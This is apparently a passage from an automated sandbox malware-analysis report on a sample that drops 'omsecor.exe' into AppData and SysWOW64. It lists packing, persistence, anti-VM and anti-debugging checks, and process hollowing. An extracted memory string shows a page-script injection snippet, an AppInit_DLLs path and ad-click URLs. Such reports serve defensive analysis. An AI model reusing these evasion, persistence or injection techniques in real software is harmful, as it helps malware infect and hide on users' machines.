            Source: C:\Users\user\AppData\Roaming\omsecor.exe	Code function: 26_2_00402FDD push ecx; ret 26_2_00402FF0
            Source: C:\Users\user\AppData\Roaming\omsecor.exe	Code function: 28_2_0040D293 push ecx; ret 28_2_0040D2A3
            Source: C:\Users\user\AppData\Roaming\omsecor.exe	Code function: 28_2_0040CBB5 push ecx; ret 28_2_0040CBC8
            Source: fmlgbgc2p5.exe	Static PE information: section name: .MPRESS1 entropy: 7.998409371053569
            Source: omsecor.exe.2.dr	Static PE information: section name: .MPRESS1 entropy: 7.998409371053569
            Source: omsecor.exe.7.dr	Static PE information: section name: .MPRESS1 entropy: 7.998409371053569

            Persistence and Installation Behavior

            Source: C:\Windows\SysWOW64\omsecor.exeExecutable created and started: C:\Windows\SysWOW64\omsecor.exeJump to behavior
            Source: C:\Users\user\Desktop\fmlgbgc2p5.exeFile created: C:\Users\user\AppData\Roaming\omsecor.exeJump to dropped file
            Source: C:\Users\user\AppData\Roaming\omsecor.exeFile created: C:\Windows\SysWOW64\omsecor.exeJump to dropped file
            Source: C:\Users\user\AppData\Roaming\omsecor.exeFile created: C:\Windows\SysWOW64\omsecor.exeJump to dropped file
            Source: C:\Users\user\Desktop\fmlgbgc2p5.exeCode function: 2_2_0040350F HeapAlloc,HeapAlloc,GetPrivateProfileStringW,GetPrivateProfileStringW,HeapAlloc,GetPrivateProfileStringW,GetPrivateProfileIntW,GetPrivateProfileStringW,GetPrivateProfileStringW,2_2_0040350F
            Source: C:\Users\user\Desktop\fmlgbgc2p5.exeCode function: 2_2_004039EA HeapAlloc,HeapAlloc,GetPrivateProfileStringW,GetPrivateProfileStringW,HeapAlloc,StrStrIW,StrStrIW,GetPrivateProfileStringW,GetPrivateProfileStringW,GetPrivateProfileStringW,2_2_004039EA
            Source: C:\Users\user\AppData\Roaming\omsecor.exeCode function: 7_2_0040350F HeapAlloc,HeapAlloc,GetPrivateProfileStringW,GetPrivateProfileStringW,HeapAlloc,GetPrivateProfileStringW,GetPrivateProfileIntW,GetPrivateProfileStringW,GetPrivateProfileStringW,7_2_0040350F
            Source: C:\Users\user\AppData\Roaming\omsecor.exeCode function: 7_2_004039EA HeapAlloc,HeapAlloc,GetPrivateProfileStringW,GetPrivateProfileStringW,HeapAlloc,StrStrIW,StrStrIW,GetPrivateProfileStringW,GetPrivateProfileStringW,GetPrivateProfileStringW,7_2_004039EA
            Source: C:\Windows\SysWOW64\omsecor.exeCode function: 14_2_0040350F HeapAlloc,HeapAlloc,GetPrivateProfileStringW,GetPrivateProfileStringW,HeapAlloc,GetPrivateProfileStringW,GetPrivateProfileIntW,GetPrivateProfileStringW,GetPrivateProfileStringW,14_2_0040350F
            Source: C:\Windows\SysWOW64\omsecor.exeCode function: 14_2_004039EA HeapAlloc,HeapAlloc,GetPrivateProfileStringW,GetPrivateProfileStringW,HeapAlloc,StrStrIW,StrStrIW,GetPrivateProfileStringW,GetPrivateProfileStringW,GetPrivateProfileStringW,14_2_004039EA
            Source: C:\Users\user\AppData\Roaming\omsecor.exeCode function: 18_2_0040350F HeapAlloc,HeapAlloc,GetPrivateProfileStringW,GetPrivateProfileStringW,HeapAlloc,GetPrivateProfileStringW,GetPrivateProfileIntW,GetPrivateProfileStringW,GetPrivateProfileStringW,18_2_0040350F
            Source: C:\Users\user\AppData\Roaming\omsecor.exeCode function: 18_2_004039EA HeapAlloc,HeapAlloc,GetPrivateProfileStringW,GetPrivateProfileStringW,HeapAlloc,StrStrIW,StrStrIW,GetPrivateProfileStringW,GetPrivateProfileStringW,GetPrivateProfileStringW,18_2_004039EA
            Source: C:\Windows\SysWOW64\omsecor.exeCode function: 24_2_0040350F HeapAlloc,HeapAlloc,GetPrivateProfileStringW,GetPrivateProfileStringW,HeapAlloc,GetPrivateProfileStringW,GetPrivateProfileIntW,GetPrivateProfileStringW,GetPrivateProfileStringW,24_2_0040350F
            Source: C:\Windows\SysWOW64\omsecor.exeCode function: 24_2_004039EA HeapAlloc,HeapAlloc,GetPrivateProfileStringW,GetPrivateProfileStringW,HeapAlloc,StrStrIW,StrStrIW,GetPrivateProfileStringW,GetPrivateProfileStringW,GetPrivateProfileStringW,24_2_004039EA
            Source: C:\Users\user\AppData\Roaming\omsecor.exeCode function: 28_2_0040350F HeapAlloc,HeapAlloc,GetPrivateProfileStringW,GetPrivateProfileStringW,HeapAlloc,GetPrivateProfileStringW,GetPrivateProfileIntW,GetPrivateProfileStringW,GetPrivateProfileStringW,28_2_0040350F
            Source: C:\Users\user\AppData\Roaming\omsecor.exeCode function: 28_2_004039EA HeapAlloc,HeapAlloc,GetPrivateProfileStringW,GetPrivateProfileStringW,HeapAlloc,StrStrIW,StrStrIW,GetPrivateProfileStringW,GetPrivateProfileStringW,GetPrivateProfileStringW,28_2_004039EA
            Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\omsecor.exe | Evasive API call chain: RegOpenKey,DecisionNodes,Sleep (graph_14-5814)
            Source: C:\Users\user\Desktop\fmlgbgc2p5.exe | Evasive API call chain: RegOpenKey,DecisionNodes,ExitProcess (graph_2-5814)
            Source: C:\Windows\SysWOW64\omsecor.exe | Evasive API call chain: RegOpenKey,DecisionNodes,ExitProcess (graph_14-5814)
            Source: C:\Users\user\Desktop\fmlgbgc2p5.exe | Evasive API call chain: RegOpenKey,DecisionNodes,Sleep (graph_2-5814)
            Source: C:\Users\user\AppData\Roaming\omsecor.exe | Evasive API call chain: RegOpenKey,DecisionNodes,Sleep (graph_7-5813)
            Source: C:\Users\user\AppData\Roaming\omsecor.exe | Evasive API call chain: RegOpenKey,DecisionNodes,ExitProcess (graph_7-5813)
            Source: C:\Windows\SysWOW64\omsecor.exe | Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess (graph_13-3843)
            Source: C:\Windows\SysWOW64\omsecor.exe | Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep (graph_14-5876)
            Source: C:\Users\user\AppData\Roaming\omsecor.exe | Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess (graph_4-3846)
            Source: C:\Users\user\Desktop\fmlgbgc2p5.exe | Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep (graph_2-5876)
            Source: C:\Users\user\Desktop\fmlgbgc2p5.exe | Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess (graph_0-3843)
            Source: C:\Users\user\AppData\Roaming\omsecor.exe | Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep (graph_7-5875)
            Source: C:\Users\user\Desktop\fmlgbgc2p5.exe | API coverage: 8.6 %
            Source: C:\Windows\SysWOW64\omsecor.exe | API coverage: 8.6 % (2 occurrences)
            Source: C:\Users\user\AppData\Roaming\omsecor.exe TID: 7456 | Thread sleep time: -40000s >= -30000s
            Source: C:\Users\user\AppData\Roaming\omsecor.exe TID: 6308 | Thread sleep time: -40000s >= -30000s
            Source: C:\Users\user\AppData\Roaming\omsecor.exe | Last function: Thread delayed
            Source: C:\Users\user\Desktop\fmlgbgc2p5.exe | Code function: 0_2_004012C0 FindFirstFileA,0_2_004012C0
            Source: C:\Users\user\Desktop\fmlgbgc2p5.exe | Code function: 2_2_0040ABD9 FindFirstFileW,FindClose,2_2_0040ABD9
            Source: C:\Users\user\Desktop\fmlgbgc2p5.exe | Code function: 2_2_00408248 FindFirstFileW,Sleep,WaitForSingleObject,PathMatchSpecW,Sleep,Sleep,FindNextFileW,FindClose,2_2_00408248
            Source: C:\Users\user\AppData\Roaming\omsecor.exe | Code function: 4_2_004012C0 FindFirstFileA,4_2_004012C0
            Source: C:\Users\user\AppData\Roaming\omsecor.exe | Code function: 7_2_0040ABD9 FindFirstFileW,FindClose,7_2_0040ABD9
            Source: C:\Users\user\AppData\Roaming\omsecor.exe | Code function: 7_2_00408248 FindFirstFileW,Sleep,WaitForSingleObject,PathMatchSpecW,Sleep,Sleep,FindNextFileW,FindClose,7_2_00408248
            Source: C:\Windows\SysWOW64\omsecor.exe | Code function: 13_2_004012C0 FindFirstFileA,13_2_004012C0
            Source: C:\Windows\SysWOW64\omsecor.exe | Code function: 14_2_0040ABD9 FindFirstFileW,FindClose,14_2_0040ABD9
            Source: C:\Windows\SysWOW64\omsecor.exe | Code function: 14_2_00408248 FindFirstFileW,Sleep,WaitForSingleObject,PathMatchSpecW,Sleep,Sleep,FindNextFileW,FindClose,14_2_00408248
            Source: C:\Users\user\AppData\Roaming\omsecor.exe | Code function: 16_2_004012C0 FindFirstFileA,16_2_004012C0
            Source: C:\Users\user\AppData\Roaming\omsecor.exe | Code function: 18_2_0040ABD9 FindFirstFileW,FindClose,18_2_0040ABD9
            Source: C:\Users\user\AppData\Roaming\omsecor.exe | Code function: 18_2_00408248 FindFirstFileW,Sleep,WaitForSingleObject,PathMatchSpecW,Sleep,Sleep,FindNextFileW,FindClose,18_2_00408248
            Source: C:\Windows\SysWOW64\omsecor.exe | Code function: 23_2_004012C0 FindFirstFileA,23_2_004012C0
            Source: C:\Windows\SysWOW64\omsecor.exe | Code function: 24_2_0040ABD9 FindFirstFileW,FindClose,24_2_0040ABD9
            Source: C:\Windows\SysWOW64\omsecor.exe | Code function: 24_2_00408248 FindFirstFileW,Sleep,WaitForSingleObject,PathMatchSpecW,Sleep,Sleep,FindNextFileW,FindClose,24_2_00408248
            Source: C:\Users\user\AppData\Roaming\omsecor.exe | Code function: 26_2_004012C0 FindFirstFileA,26_2_004012C0
            Source: C:\Users\user\AppData\Roaming\omsecor.exe | Code function: 28_2_0040ABD9 FindFirstFileW,FindClose,28_2_0040ABD9
            Source: C:\Users\user\AppData\Roaming\omsecor.exe | Code function: 28_2_00408248 FindFirstFileW,Sleep,WaitForSingleObject,PathMatchSpecW,Sleep,Sleep,FindNextFileW,FindClose,28_2_00408248
            Source: Amcache.hve.6.dr | Binary or memory string: VMware
            Source: Amcache.hve.6.dr | Binary or memory string: VMware Virtual USB Mouse
            Source: Amcache.hve.6.dr | Binary or memory string: vmci.syshbin
            Source: Amcache.hve.6.dr | Binary or memory string: VMware, Inc.
            Source: Amcache.hve.6.dr | Binary or memory string: VMware20,1hbin@
            Source: Amcache.hve.6.dr | Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
            Source: Amcache.hve.6.dr | Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
            Source: Amcache.hve.6.dr | Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
            Source: omsecor.exe, 00000007.00000002.1840387008.0000000000622000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 00000012.00000002.2334469520.00000000006C0000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 0000001C.00000002.2589585236.0000000000504000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 0000001C.00000002.2589585236.00000000004CE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
            Source: Amcache.hve.6.dr | Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
            Source: Amcache.hve.6.dr | Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
            Source: omsecor.exe, 00000007.00000002.1840387008.0000000000622000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW>Y6P
            Source: Amcache.hve.6.dr | Binary or memory string: c:/windows/system32/drivers/vmci.sys
            Source: Amcache.hve.6.dr | Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
            Source: Amcache.hve.6.dr | Binary or memory string: vmci.sys
            Source: Amcache.hve.6.dr | Binary or memory string: vmci.syshbin`
            Source: Amcache.hve.6.dr | Binary or memory string: \driver\vmci,\driver\pci
            Source: Amcache.hve.6.dr | Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
            Source: Amcache.hve.6.dr | Binary or memory string: VMware20,1
            Source: Amcache.hve.6.dr | Binary or memory string: Microsoft Hyper-V Generation Counter
            Source: Amcache.hve.6.dr | Binary or memory string: NECVMWar VMware SATA CD00
            Source: Amcache.hve.6.dr | Binary or memory string: VMware Virtual disk SCSI Disk Device
            Source: Amcache.hve.6.dr | Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
            Source: Amcache.hve.6.dr | Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
            Source: Amcache.hve.6.dr | Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
            Source: Amcache.hve.6.dr | Binary or memory string: VMware PCI VMCI Bus Device
            Source: Amcache.hve.6.dr | Binary or memory string: VMware VMCI Bus Device
            Source: Amcache.hve.6.dr | Binary or memory string: VMware Virtual RAM
            Source: Amcache.hve.6.dr | Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
            Source: omsecor.exe, 00000012.00000002.2334469520.0000000000668000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW wl%SystemRoot%\system32\mswsock.dll#
            Source: omsecor.exe, 00000007.00000002.1840387008.00000000005C8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW@
            Source: Amcache.hve.6.dr | Binary or memory string: VMware-42 27 88 19 56 cc 59 1a-97 79 fb 8c bf a1 e2 9d
            Source: Amcache.hve.6.dr | Binary or memory string: vmci.inf_amd64_68ed49469341f563
            Source: C:\Users\user\Desktop\fmlgbgc2p5.exe | API call chain: ExitProcess graph end node (graph_0-3547)
            Source: C:\Users\user\Desktop\fmlgbgc2p5.exe | API call chain: ExitProcess graph end node (graph_0-3844)
            Source: C:\Users\user\Desktop\fmlgbgc2p5.exe | API call chain: ExitProcess graph end node (graph_0-3857)
            Source: C:\Users\user\Desktop\fmlgbgc2p5.exe | API call chain: ExitProcess graph end node (graph_2-5904)
            Source: C:\Users\user\AppData\Roaming\omsecor.exe | API call chain: ExitProcess graph end node (graph_4-3550)
            Source: C:\Users\user\AppData\Roaming\omsecor.exe | API call chain: ExitProcess graph end node (graph_4-3860)
            Source: C:\Users\user\AppData\Roaming\omsecor.exe | API call chain: ExitProcess graph end node (graph_4-3847)
            Source: C:\Users\user\AppData\Roaming\omsecor.exe | API call chain: ExitProcess graph end node (graph_7-5903)
            Source: C:\Windows\SysWOW64\omsecor.exe | API call chain: ExitProcess graph end node (graph_13-3547)
            Source: C:\Windows\SysWOW64\omsecor.exe | API call chain: ExitProcess graph end node (graph_13-3844)
            Source: C:\Windows\SysWOW64\omsecor.exe | API call chain: ExitProcess graph end node (graph_13-3857)
            Source: C:\Windows\SysWOW64\omsecor.exe | API call chain: ExitProcess graph end node (graph_14-5904)
            Source: C:\Users\user\AppData\Roaming\omsecor.exe | API call chain: ExitProcess graph end node (8 occurrences)
            Source: C:\Windows\SysWOW64\omsecor.exe | API call chain: ExitProcess graph end node (4 occurrences)

            Anti Debugging

            Source: C:\Windows\SysWOW64\omsecor.exe | Debugger detection routine: GetTickCount, GetTickCount, DecisionNodes, ExitProcess or Sleep (graph_14-6412)
            Source: C:\Users\user\Desktop\fmlgbgc2p5.exe | Debugger detection routine: GetTickCount, GetTickCount, DecisionNodes, ExitProcess or Sleep (graph_2-6412)
            Source: C:\Users\user\AppData\Roaming\omsecor.exe | Debugger detection routine: GetTickCount, GetTickCount, DecisionNodes, ExitProcess or Sleep (graph_7-6415)
            Source: C:\Users\user\Desktop\fmlgbgc2p5.exe | Code function: 0_2_00401662 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00401662
            Source: C:\Users\user\Desktop\fmlgbgc2p5.exe | Code function: 0_2_00404854 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,__invoke_watson,GetProcAddress,GetProcAddress,__invoke_watson,0_2_00404854
            Source: C:\Users\user\Desktop\fmlgbgc2p5.exe | Code function: 0_2_00421170 GetStartupInfoA,GetProcessHeap,GetProcessHeap,RtlAllocateHeap,_fast_error_exit,___security_init_cookie,0_2_00421170
            Source: C:\Users\user\Desktop\fmlgbgc2p5.exe | Code function: 0_2_00406A50 _raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00406A50
            Source: C:\Users\user\Desktop\fmlgbgc2p5.exe | Code function: 0_2_00401662 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00401662
            Source: C:\Users\user\Desktop\fmlgbgc2p5.exe | Code function: 0_2_00404121 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00404121
            Source: C:\Users\user\Desktop\fmlgbgc2p5.exe | Code function: 0_2_0040213B SetUnhandledExceptionFilter,0_2_0040213B
            Source: C:\Users\user\Desktop\fmlgbgc2p5.exe | Code function: 2_2_004032B8 GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,MessageBoxW,VirtualProtect,MessageBoxW,VirtualProtect,VirtualProtect,SetUnhandledExceptionFilter,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,2_2_004032B8
            Source: C:\Users\user\Desktop\fmlgbgc2p5.exe | Code function: 2_2_0040CD66 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_0040CD66
            Source: C:\Users\user\AppData\Roaming\omsecor.exe | Code function: 4_2_00406A50 _raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_00406A50
            Source: C:\Users\user\AppData\Roaming\omsecor.exe | Code function: 4_2_00401662 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_00401662
            Source: C:\Users\user\AppData\Roaming\omsecor.exe | Code function: 4_2_00404121 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_00404121
            Source: C:\Users\user\AppData\Roaming\omsecor.exe | Code function: 4_2_0040213B SetUnhandledExceptionFilter,4_2_0040213B
            Source: C:\Users\user\AppData\Roaming\omsecor.exe | Code function: 7_2_004032B8 GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,MessageBoxW,VirtualProtect,MessageBoxW,VirtualProtect,VirtualProtect,SetUnhandledExceptionFilter,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,7_2_004032B8
            Source: C:\Users\user\AppData\Roaming\omsecor.exe | Code function: 7_2_0040CD66 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,7_2_0040CD66
            Source: C:\Windows\SysWOW64\omsecor.exe | Code function: 13_2_00406A50 _raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,13_2_00406A50
            Source: C:\Windows\SysWOW64\omsecor.exe | Code function: 13_2_00401662 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,13_2_00401662
            Source: C:\Windows\SysWOW64\omsecor.exe | Code function: 13_2_00404121 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,13_2_00404121
            Source: C:\Windows\SysWOW64\omsecor.exe | Code function: 13_2_0040213B SetUnhandledExceptionFilter,13_2_0040213B
            Source: C:\Windows\SysWOW64\omsecor.exe | Code function: 14_2_004032B8 GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,MessageBoxW,VirtualProtect,MessageBoxW,VirtualProtect,VirtualProtect,SetUnhandledExceptionFilter,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,14_2_004032B8
            Source: C:\Windows\SysWOW64\omsecor.exe | Code function: 14_2_0040CD66 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,14_2_0040CD66
            Source: C:\Users\user\AppData\Roaming\omsecor.exe | Code function: 16_2_00406A50 _raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,16_2_00406A50
            Source: C:\Users\user\AppData\Roaming\omsecor.exe | Code function: 16_2_00401662 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,16_2_00401662
            Source: C:\Users\user\AppData\Roaming\omsecor.exe | Code function: 16_2_00404121 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,16_2_00404121
            Source: C:\Users\user\AppData\Roaming\omsecor.exe | Code function: 16_2_0040213B SetUnhandledExceptionFilter,16_2_0040213B
            Source: C:\Users\user\AppData\Roaming\omsecor.exe | Code function: 18_2_004032B8 GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,MessageBoxW,VirtualProtect,MessageBoxW,VirtualProtect,VirtualProtect,SetUnhandledExceptionFilter,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,18_2_004032B8
            Source: C:\Users\user\AppData\Roaming\omsecor.exe | Code function: 18_2_0040CD66 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,18_2_0040CD66
            Source: C:\Windows\SysWOW64\omsecor.exe | Code function: 23_2_00406A50 _raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,23_2_00406A50
            Source: C:\Windows\SysWOW64\omsecor.exe | Code function: 23_2_00401662 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,23_2_00401662
            Source: C:\Windows\SysWOW64\omsecor.exe | Code function: 23_2_00404121 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,23_2_00404121
            Source: C:\Windows\SysWOW64\omsecor.exe | Code function: 23_2_0040213B SetUnhandledExceptionFilter,23_2_0040213B
            Source: C:\Windows\SysWOW64\omsecor.exe | Code function: 24_2_004032B8 GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,MessageBoxW,VirtualProtect,MessageBoxW,VirtualProtect,VirtualProtect,SetUnhandledExceptionFilter,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,24_2_004032B8
            Source: C:\Windows\SysWOW64\omsecor.exe | Code function: 24_2_0040CD66 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,24_2_0040CD66
            Source: C:\Users\user\AppData\Roaming\omsecor.exe | Code function: 26_2_00406A50 _raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,26_2_00406A50
            Source: C:\Users\user\AppData\Roaming\omsecor.exe | Code function: 26_2_00401662 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,26_2_00401662
            Source: C:\Users\user\AppData\Roaming\omsecor.exe | Code function: 26_2_00404121 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,26_2_00404121
            Source: C:\Users\user\AppData\Roaming\omsecor.exe | Code function: 26_2_0040213B SetUnhandledExceptionFilter,26_2_0040213B
            Source: C:\Users\user\AppData\Roaming\omsecor.exe | Code function: 28_2_004032B8 GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,MessageBoxW,VirtualProtect,MessageBoxW,VirtualProtect,VirtualProtect,SetUnhandledExceptionFilter,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,28_2_004032B8
            Source: C:\Users\user\AppData\Roaming\omsecor.exe | Code function: 28_2_0040CD66 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,28_2_0040CD66

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Users\user\Desktop\fmlgbgc2p5.exe | Memory written: C:\Users\user\Desktop\fmlgbgc2p5.exe base: 400000 value starts with: 4D5A
            Source: C:\Users\user\AppData\Roaming\omsecor.exe | Memory written: C:\Users\user\AppData\Roaming\omsecor.exe base: 400000 value starts with: 4D5A (3 occurrences)
            Source: C:\Windows\SysWOW64\omsecor.exe | Memory written: C:\Windows\SysWOW64\omsecor.exe base: 400000 value starts with: 4D5A (2 occurrences)
            Source: C:\Users\user\Desktop\fmlgbgc2p5.exe | Process created: C:\Users\user\Desktop\fmlgbgc2p5.exe C:\Users\user\Desktop\fmlgbgc2p5.exe
            Source: C:\Users\user\AppData\Roaming\omsecor.exe | Process created: C:\Users\user\AppData\Roaming\omsecor.exe C:\Users\user\AppData\Roaming\omsecor.exe (3 occurrences)
            Source: C:\Windows\SysWOW64\omsecor.exe | Process created: C:\Windows\SysWOW64\omsecor.exe C:\Windows\SysWOW64\omsecor.exe (2 occurrences)
            Source: omsecor.exe | Binary or memory string: Shell_TrayWnd
            Source: fmlgbgc2p5.exe, 00000000.00000002.1641221794.000000000048D000.00000004.00000020.00020000.00000000.sdmp, fmlgbgc2p5.exe, 00000000.00000002.1641457885.00000000020BB000.00000004.00000020.00020000.00000000.sdmp, fmlgbgc2p5.exe, 00000002.00000002.1335363161.0000000000400000.00000040.00000400.00020000.00000000.sdmp | Binary or memory string: ftpPriorHostTimeCorrUniqueNumhttp://AppEvents\Schemes\Apps\Explorer\Navigating\.currentSOFTWARE\Classes\MIME\Database\Content Type\text/htmlapplication/x-javascripttext/javascriptCLSIDBuildSOFTWARE\Microsoft\Internet ExplorerJOB FILE^nocryptPage generated at: http:__scMMdj490)0-Osdurandcrandsetvarmsec1970b_nav_time*CsMSoftware\Microsoft\Windows NT\CurrentVersion\WindowsAppInit_DLLsC:\WINDOWS\system32\gbdwpbm.dll.jar.mpeg.mpg.3gp.mov.mkv.wmv.avi.mp3.pdf.7z.gz.exe.rar.zip.xls.docvar scr= document.createElement("script"); scr.src = "%s"; document.getElementsByTagName("head")[0].appendChild(scr);Aahttp_self&host=track_eventsjavascriptbegun.ru/click.jsp?url=an.yandex.ru/count_blank,"url""domain""encrypted""URL""condition_id""kwtype"<domain></domain><url></url><title></title>http://click0^POSTShell.ExplorerAtlAxWineventConnShell_TrayWndAccept: */*
            Source: C:\Users\user\Desktop\fmlgbgc2p5.exe | Code function: 0_2_0040327A cpuid 0_2_0040327A
            Source: C:\Users\user\Desktop\fmlgbgc2p5.exe | Code function: GetLocaleInfoA,0_2_00406E83
            Source: C:\Users\user\AppData\Roaming\omsecor.exe | Code function: GetLocaleInfoA,4_2_00406E83
